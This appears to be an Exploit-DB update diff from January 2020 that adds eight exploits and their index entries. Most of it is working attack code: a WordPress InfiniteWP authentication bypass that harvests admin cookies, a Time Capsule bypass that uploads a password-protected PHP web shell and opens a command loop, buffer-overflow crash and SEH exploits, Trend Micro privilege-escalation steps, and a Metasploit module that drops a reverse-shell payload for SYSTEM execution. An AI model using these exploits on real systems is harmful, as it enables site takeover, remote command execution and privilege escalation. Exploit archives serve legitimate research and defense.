DB: 2020-01-18

8 changes to exploits/shellcodes

APKF Product Key Finder 2.5.8.0 - 'Name' Denial of Service (PoC)
GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC)
Torrent FLV Converter 1.51 Build 117 - Stack Oveflow (SEH partial overwrite)
Trend Micro Maximum Security 2019 - Arbitrary Code Execution
Trend Micro Maximum Security 2019 - Privilege Escalation
Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (Metasploit)
Wordpress Plugin InfiniteWP Client 1.9.4.5 - Authentication Bypass
Wordpress Time Capsule Plugin 1.21.16 - Authentication Bypass

exploits/php/webapps/47939.py

@@ -0,0 +1,39 @@
+# Exploit Title: Wordpress Plugin InfiniteWP Client 1.9.4.5 - Authentication Bypass
+# Date: 2020-1-16
+# Exploit Author: Raphael Karger
+# Vendor Homepage: https://infinitewp.com/
+# Version: InfiniteWP Client < 1.9.4.5
+
+#!/usr/bin/python3
+
+import requests
+import json
+import argparse
+import base64
+import json
+import urllib3
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+def exploit(site, username):
+    json_info = {"iwp_action":"add_site","params":{"username": username}}
+    try:
+        return requests.post(site, timeout=5, verify=False,
+            headers={"User-Agent" : "raphaelrocks"},
+            data="_IWP_JSON_PREFIX_{}".format(base64.b64encode(json.dumps(json_info).encode("utf-8")).decode("utf-8"))
+        )
+    except Exception as e:
+        print("[-] HTTP Exploit Error: {}".format(e))
+    return False
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument("-n", "--username", dest="username", help="Username of admin, default is admin", default="admin")
+    parser.add_argument("-u", "--url", dest="url", help="Root URL of Site")
+    args = parser.parse_args()
+    site_exploit = exploit(args.url, args.username)
+    if site_exploit and site_exploit.status_code == requests.codes.ok:
+        cookie_string = "; ".join([str(x)+"="+str(y) for x,y in site_exploit.cookies.items()])
+        if cookie_string:
+            print("[+] Use Cookies to Login: \n{}".format(cookie_string))
+            exit(0)
+    print("[-] Exploit Failed")

exploits/php/webapps/47941.py

@@ -0,0 +1,58 @@
+# Exploit Title: Wordpress Time Capsule Plugin 1.21.16 - Authentication Bypass
+# Date: 2020-01-16
+# Exploit Author: B. Canavate 
+# Vendor Homepage: https://wptimecapsule.com/
+# Software Link: https://wptimecapsule.com/
+# Version:  Wordpress Time Capsule Plugin < 1.21.16
+# Tested on: LAMP stack with most recent Wordpress
+
+
+
+---- code below ----
+
+
+# PoC by: B. Canavate 
+# Based on the research done by the fine people at: https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/
+# GitHub repo with breakdown: https://github.com/SECFORCE/WPTimeCapsulePOC
+
+
+import requests
+import sys
+
+
+if len(sys.argv) == 1:
+	print "Usage:  poc.py http://127.0.0.1/ - Get Admin cookie"
+	print " poc.py http://127.0.0.1/ shell - Get Admin Cookie + Upload a shell on /wp-content/plugins/shell/shell.php "
+	print " Shell usage: /shell.php?pass=mak3ithapp3n&cmd=COMMAND"
+else:
+	url = sys.argv[1]
+	session = requests.Session()
+	rawBody = "IWP_JSON_PREFIX"
+	headers = {"Referer":url}
+	response = session.post(url, data=rawBody, headers=headers, verify=False)
+	for cookie in response.cookies:
+		if "logged" in cookie.name:
+			cookieadmin = cookie
+	response2 = session.get(url+"wp-admin/index.php", headers=headers, cookies = response.cookies, verify=False)
+	if "Dashboard" in response2.content:
+		print "This is the cookie that  you are looking for :-)"
+		print cookieadmin.name+":"+cookieadmin.value
+
+		if len(sys.argv) == 3 and sys.argv[2] == "shell":
+			response = session.get(url+"/wp-content/plugins/shell/shell.php?pass=mak3ithapp3n&cmd=",verify=False)
+			if response.status_code != 200 :
+				paramsGet = {"action":"upload-plugin"}
+				paramsPost = {"_wpnonce":"1ef2140910","_wp_http_referer":"/wp-admin/plugin-install.php","install-plugin-submit":"Install Now"}
+				paramsMultipart = [('pluginzip', ('shell.zip', "PK\x03\x04\x14\x03\x00\x00\x08\x00ra0P\xf2\x0f\x1d\xad\xe2\x00\x00\x00j\x01\x00\x00\x09\x00\x00\x00shell.php\x85\x8d1O\xc30\x10\x85\xe7\xfaW\x9c\xaa\xaaM:4\xa0n\x86P\xa1\x10\x24\x18\xa0\x24\x94\x05!d\xdc\x0b\xb6\x88c+\xe7\x0c\x15\xea\x7f\xc7\xc9\x80\xaav\xe8-\xa7\xbb\xf7\xbd\xf7\xaeWN9\x06a\x92\xf9\xb0\xd6u\xf7\xad\x1bx\x12\x069\x94yv\xff\\d9\xacm\x06\xa5\xc2\xba>d6\xc5\x03\x07\xe5\xbd\x23\x9e\x24\x84\xb2\xb2\xad\xc4\x85\xb4f\x80\xee\x90d\xab\x9d\xd7\xb6\xe1\xf0\xd8\x91\x07\x01(h\x07\xf4\x9fs\xdbye[\x0e_\xc1\xa8\x86\xcf\x1b\xb64\x18.\x16\x97\x07\xc8\x99\xaay\xc2\x180\xd0U\xa4\x89\xd0G\x93\xcf\"\x7f\xd9\xe4\xe5\xeb\xfbL\x9a\xed\xec\x23\x86\xe9\x14N\x24'\x88\x82\x16\xff\xb2\x91\xae\xe0T\x814\x85\xb1\x11?K\xed\x95pn\xd9\x8c{t4\x09\x91\x90\xc2q\xc7U\x90hG\x1eM\xd4\x13q\x7fo5\x86\xb5g{\xb6\xbaa\x7fPK\x01\x02?\x03\x14\x03\x00\x00\x08\x00ra0P\xf2\x0f\x1d\xad\xe2\x00\x00\x00j\x01\x00\x00\x09\x00\x24\x00\x00\x00\x00\x00\x00\x00 \x80\xb4\x81\x00\x00\x00\x00shell.php\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x00LE\x19f\xcc\xd5\x01\x00LE\x19f\xcc\xd5\x01\x00LE\x19f\xcc\xd5\x01PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00[\x00\x00\x00\x09\x01\x00\x00\x00\x00", 'application/zip'))]
+				headers = {"Origin":url,"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0","Referer":url+"/wp-admin/plugin-install.php","Connection":"close","Accept-Encoding":"gzip, deflate","DNT":"1","Accept-Language":"en-GB,en;q=0.5"}
+				cookies = {"wordpress_test_cookie":"WP+Cookie+check","wordpress_5c016e8f0f95f039102cbe8366c5c7f3":"secforce%7C1579345389%7CVEj3PYaEDRwiYHj9dvd3H2813BfDsqNxAJQyF0N4nOa%7Ccd8ab0bf244d404dc2b3ec55335545553a8017c254357f76b061345dfa751545","wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3":"secforce%7C1579345389%7CfoMJPKzwmHvHzKkdwvUcxUIXU327HQWR6Lrv1oP6qzA%7C2531f7ca8075fd9e0a56293dd7a627b2de1ddfe49ff34be9f0835e2a5e4cccb4","wp-settings-time-1":"1579176444"}
+				response = session.post(url+"/wp-admin/update.php", data=paramsPost, files=paramsMultipart, params=paramsGet, headers=headers, cookies=cookies)
+			print ("Now you have a shell! ")
+			command = ""
+			while(1 and (command != "exit")):
+				command = str(raw_input())
+				response = session.get(url+"/wp-content/plugins/shell/shell.php?pass=mak3ithapp3n&cmd="+command, verify=False)
+				print(response.content)
+			print "Remember to delete the shell.php :-)"
+	else:
+		print "There was an error :("

exploits/windows/dos/47937.py

@@ -0,0 +1,33 @@
+# Exploit Title: APKF Product Key Finder 2.5.8.0 - 'Name' Denial of Service (PoC)
+# Exploit Author: Ismail Tasdelen
+# Exploit Date: 2020-01-16
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/apkf_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install APKF Product Key Finder
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.APKF Product Key Finder Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")

exploits/windows/dos/47942.py

@@ -0,0 +1,33 @@
+# Exploit Title: GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC)
+# Exploit Author: Ismail Tasdelen
+# Exploit Date: 2020-01-16
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/gpwdfinder_setup.exe
+# Tested on OS: Windows 10
+# CVE : N/A
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install GTalk Password Finder
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.GTalk Password Finder Crashed
+'''
+
+#!/usr/bin/python
+    
+buffer = "A" * 1000
+ 
+payload = buffer
+try:
+    f=open("poc.txt","w")
+    print("[+] Creating %s bytes evil payload." %len(payload))
+    f.write(payload)
+    f.close()
+    print("[+] File created!")
+except:
+    print("File cannot be created.")

exploits/windows/local/47938.py

@@ -0,0 +1,31 @@
+# Exploit Title: Torrent FLV Converter 1.51 Build 117 - Stack Oveflow (SEH partial overwrite)
+# Date: 2020-01-16
+# Exploit Author: antonio
+# Vendor Homepage: http://www.torrentrockyou.com/
+# Software Link: http://www.torrentrockyou.com/download/trflvconverter.exe
+# Version: 1.51 Build 117
+# Tested on: Windows 7 SP1 32-bit
+
+# Copy paste the contents of poc.txt into the
+# Registration Code input field.
+
+#!/usr/bin/python
+
+nseh_offset = 4500
+total = 5000
+
+# badchars
+# --------
+# 0x00, 0x0a, 0x0d, 0x80
+# 0xf0-x0ff, 0xe0-0x0ef, 0x70-0x7a
+# 0x61-0x6f, 0x9a, 0x9c, 0x9e
+
+poc = ""
+poc += "A"*(nseh_offset - 53)
+poc += "\x90"*53
+poc += "\x7d\xcb\x90\x90" # jump backwards to NOPs: jge via SF = OF
+poc += "\x7f\xb3\x45" # nseh pop pop ret: 3-byte partial overwrite
+
+file = open("poc_seh.txt","w")
+file.write(poc)
+file.close()

exploits/windows/local/47940.txt

@@ -0,0 +1,90 @@
+# Exploit Title: Trend Micro Maximum Security 2019 - Arbitrary Code Execution
+# Date: 2020-1-16
+# Exploit Author: hyp3rlinx
+# Vendor Homepage: www.trendmicro.com
+# Version: Platform Microsoft Windows, Premium Security 2019 (v15), Maximum Security 2019 (v15)
+# Internet Security 2019 (v15), Antivirus + Security 2019 (v15)
+
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-SECURITY-CONSUMER-SECURITY-BYPASS-PROTECTED-SERVICE-TAMPERING.txt
+[+] ISR: ApparitionSec          
+
+
+[Vendor]
+www.trendmicro.com
+
+
+[Product]
+Trend Micro Security 2019 (Consumer) Multiple Products
+
+
+Trend Micro Security provides comprehensive protection for your devices.
+This includes protection against ransomware, viruses, malware, spyware, and identity theft.
+
+
+[Vulnerability Type]
+Security Bypass Protected Service Tampering
+
+
+[CVE Reference]
+CVE-2019-19697
+
+
+[Security Issue]
+Trend Micro Maximum Security is vulnerable to arbitrary code execution as it allows for creation of registry key to target a process running as SYSTEM.
+This can allow a malware to gain elevated privileges to take over and shutdown services that require SYSTEM privileges like Trend Micros "Asmp"
+service "coreServiceShell.exe" which does not allow Administrators to tamper with them.
+
+This could allow an attacker or malware to gain elevated privileges and tamper with protected services by disabling or otherwise preventing them to start.
+Note administrator privileges are required to exploit this vulnerability.
+
+
+[CVSS 3.0 Scores: 3.9]
+
+
+[Affected versions]
+Platform Microsoft Windows
+Premium Security 2019 (v15)
+Maximum Security 2019 (v15)
+Internet Security 2019 (v15)
+Antivirus + Security 2019 (v15)
+
+
+[References]
+https://esupport.trendmicro.com/en-us/home/pages/technical-support/1124090.aspx
+
+
+[Exploit/POC]
+1) Create a entry for the following registry key targeting "PtWatchdog.exe" and set the debugger string value to an arbitrary executable to gain SYSTEM privs.
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PtWatchdog.exe
+
+2) Create a string named "debugger" under the reg key and give it the value of the executable you wish to run as SYSTEM.
+
+3) Restart the machine or wait until service is restart then you get SYSTEM and can now disable Trend Micro endpoint security coreServiceShell.exe service
+
+
+[Network Access]
+Local
+
+
+[Severity]
+Low
+
+
+[Disclosure Timeline]
+Vendor Notification: October 8, 2019
+Vendor confirms issue: October 28, 2019
+Vendor release date: January 14, 2020
+January 16, 2020 : Public Disclosure
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

exploits/windows/local/47943.txt

@@ -0,0 +1,98 @@
+# Exploit Title: Trend Micro Maximum Security 2019 - Privilege Escalation
+# Date: 2020-1-16
+# Exploit Author: hyp3rlinx
+# Vendor Homepage: www.trendmicro.com
+# Version: Platform Microsoft Windows, Premium Security 2019 (v15), Maximum Security 2019 (v15)
+# Internet Security 2019 (v15), Antivirus + Security 2019 (v15)
+
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-SECURITY-CONSUMER-PERSISTENT-ARBITRARY-CODE-EXECUTION.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec     
+ 
+
+[Vendor]
+www.trendmicro.com
+
+
+[Product(s)]
+Trend Micro Security (Consumer) Multiple Products
+
+
+Trend Micro Security provides comprehensive protection for your devices.
+This includes protection against ransomware, viruses, malware, spyware, and identity theft.
+
+
+[Vulnerability Type]
+Persistent Arbitrary Code Execution
+
+
+[CVE Reference]
+CVE-2019-20357
+
+
+[CVSSv3 Scores: 6.7]
+
+
+[Security Issue]
+Trend Micro Security can potentially allow an attackers to use a malicious program to escalate privileges
+to SYSTEM integrity and attain persistence on a vulnerable system.
+
+
+[Product Affected Versions]
+Platform Microsoft Windows
+
+Premium Security 2019 (v15) and 2020 (v16)
+
+Maximum Security
+2019 (v15) and 2020 (v16)
+
+Internet Security
+2019 (v15) and 2020 (v16)
+	
+Antivirus + Security
+2019 (v15) and 2020 (v16)
+
+
+[References]
+https://esupport.trendmicro.com/en-us/home/pages/technical-support/1124099.aspx
+
+[Exploit/POC]
+Compile C test code "Program.c"
+
+void main(void){
+ puts("Done!");
+ system("pause");
+}
+
+1) Place under c:\ dir.
+2) Reboot the machine, the coreServiceShell.exe service loads and executes our binary with SYSTEM integrity.
+
+
+
+[Network Access]
+Local
+
+
+[Severity]
+Medium
+
+
+
+[Disclosure Timeline]
+Vendor Notification: October 8, 2019
+vendor advisory: January 15, 2020
+January 16, 2020 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

exploits/windows/local/47944.rb

@@ -0,0 +1,113 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Exploit::EXE
+  include Post::File
+  include Post::Windows::Priv
+  include Post::Windows::Services
+  include Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Plantronics Hub SpokesUpdateService Privilege Escalation',
+      'Description'    => %q{
+        The Plantronics Hub client application for Windows makes use of an
+        automatic update service `SpokesUpdateService.exe` which automatically
+        executes a file specified in the `MajorUpgrade.config` configuration
+        file as SYSTEM. The configuration file is writable by all users by default.
+
+        This module has been tested successfully on Plantronics Hub version 3.13.2
+        on Windows 7 SP1 (x64).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Markus Krell', # Discovery and PoC
+        'bcoles'        # Metasploit
+      ],
+      'References'     =>
+        [
+          ['CVE', '2019-15742'],
+          ['EDB', '47845'],
+          ['URL', 'https://support.polycom.com/content/dam/polycom-support/global/documentation/plantronics-hub-local-privilege-escalation-vulnerability.pdf']
+        ],
+      'Platform'       => ['win'],
+      'SessionTypes'   => ['meterpreter'],
+      'Targets'        => [['Automatic', {}]],
+      'DisclosureDate' => '2019-08-30',
+      'DefaultOptions' =>
+        {
+          'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+        },
+      'Notes'          =>
+        {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability'   => [ CRASH_SAFE ]
+        },
+      'DefaultTarget'  => 0))
+    register_advanced_options [
+      OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)', nil]),
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].blank? ? session.sys.config.getenv('TEMP') : datastore['WritableDir'].to_s
+  end
+
+  def service_exists?(service)
+    srv_info = service_info(service)
+
+    if srv_info.nil?
+      vprint_warning 'Unable to enumerate Windows services'
+      return false
+    end
+
+    if srv_info && srv_info[:display].empty?
+      return false
+    end
+
+    true
+  end
+
+  def check
+    service = 'PlantronicsUpdateService'
+
+    unless service_exists? service
+      return CheckCode::Safe("Service '#{service}' does not exist")
+    end
+
+    path = "#{session.sys.config.getenv('PROGRAMDATA')}\\Plantronics\\Spokes3G"
+
+    unless exists? path
+      return CheckCode::Safe("Directory '#{path}' does not exist")
+    end
+
+    CheckCode::Detected
+  end
+
+  def exploit
+    unless check == CheckCode::Detected
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    if is_system?
+      fail_with Failure::BadConfig, 'Session already has SYSTEM privileges'
+    end
+
+    payload_path = "#{base_dir}\\#{Rex::Text.rand_text_alphanumeric(8..10)}.exe"
+    payload_exe = generate_payload_exe
+    vprint_status "Writing payload to #{payload_path} ..."
+    write_file payload_path, payload_exe
+    register_file_for_cleanup payload_path
+
+    config_path = "#{session.sys.config.getenv('PROGRAMDATA')}\\Plantronics\\Spokes3G\\MajorUpgrade.config"
+    vprint_status "Writing configuration file to #{config_path} ..."
+    write_file config_path, "#{session.sys.config.getenv('USERNAME')}|advertise|#{payload_path}"
+    register_file_for_cleanup config_path
+  end
+end

files_exploits.csv

@@ -6657,6 +6657,8 @@ id,file,description,date,author,type,platform,port
 47919,exploits/linux/dos/47919.txt,"Redir 3.3 - Denial of Service (PoC)",2020-01-14,hieubl,dos,linux,
 47920,exploits/android/dos/47920.txt,"WeChat - Memory Corruption in CAudioJBM::InputAudioFrameToJBM",2020-01-14,"Google Security Research",dos,android,
 47921,exploits/android/dos/47921.txt,"Android - ashmem Readonly Bypasses via remap_file_pages() and ASHMEM_UNPIN",2020-01-14,"Google Security Research",dos,android,
+47937,exploits/windows/dos/47937.py,"APKF Product Key Finder 2.5.8.0 - 'Name' Denial of Service (PoC)",2020-01-17,"Ismail Tasdelen",dos,windows,
+47942,exploits/windows/dos/47942.py,"GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC)",2020-01-17,"Ismail Tasdelen",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10905,6 +10907,10 @@ id,file,description,date,author,type,platform,port
 47932,exploits/multiple/local/47932.c,"SunOS 5.10 Generic_147148-26 - Local Privilege Escalation",2020-01-16,"Marco Ivaldi",local,multiple,
 47933,exploits/windows/local/47933.rb,"Microsoft Windows - CryptoAPI (Crypt32.dll) Elliptic Curve Cryptography (ECC) Spoof Code-Signing Certificate",2020-01-15,"Oliver Lyak",local,windows,
 47935,exploits/windows_x86-64/local/47935.cpp,"Microsoft Windows 10 (19H1 1901 x64) - 'ws2ifsl.sys' Use After Free Local Privilege Escalation (kASLR kCFG SMEP)",2020-01-07,bluefrostsec,local,windows_x86-64,
+47938,exploits/windows/local/47938.py,"Torrent FLV Converter 1.51 Build 117 - Stack Oveflow (SEH partial overwrite)",2020-01-17,antonio,local,windows,
+47940,exploits/windows/local/47940.txt,"Trend Micro Maximum Security 2019 - Arbitrary Code Execution",2020-01-17,hyp3rlinx,local,windows,
+47943,exploits/windows/local/47943.txt,"Trend Micro Maximum Security 2019 - Privilege Escalation",2020-01-17,hyp3rlinx,local,windows,
+47944,exploits/windows/local/47944.rb,"Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (Metasploit)",2020-01-17,Metasploit,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42237,3 +42243,5 @@ id,file,description,date,author,type,platform,port
 47930,exploits/multiple/webapps/47930.txt,"Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal",2020-01-16,"Dhiraj Mishra",webapps,multiple,
 47931,exploits/php/webapps/47931.txt,"Rukovoditel Project Management CRM 2.5.2 - 'entities_id' SQL Injection",2020-01-16,"Fatih Çelik",webapps,php,
 47934,exploits/php/webapps/47934.txt,"Rukovoditel Project Management CRM 2.5.2 - 'filters' SQL Injection",2020-01-16,"Fatih Çelik",webapps,php,
+47939,exploits/php/webapps/47939.py,"Wordpress Plugin InfiniteWP Client 1.9.4.5 - Authentication Bypass",2020-01-17,"Raphael Karger",webapps,php,
+47941,exploits/php/webapps/47941.py,"Wordpress Time Capsule Plugin 1.21.16 - Authentication Bypass",2020-01-17,"B. Canavate",webapps,php,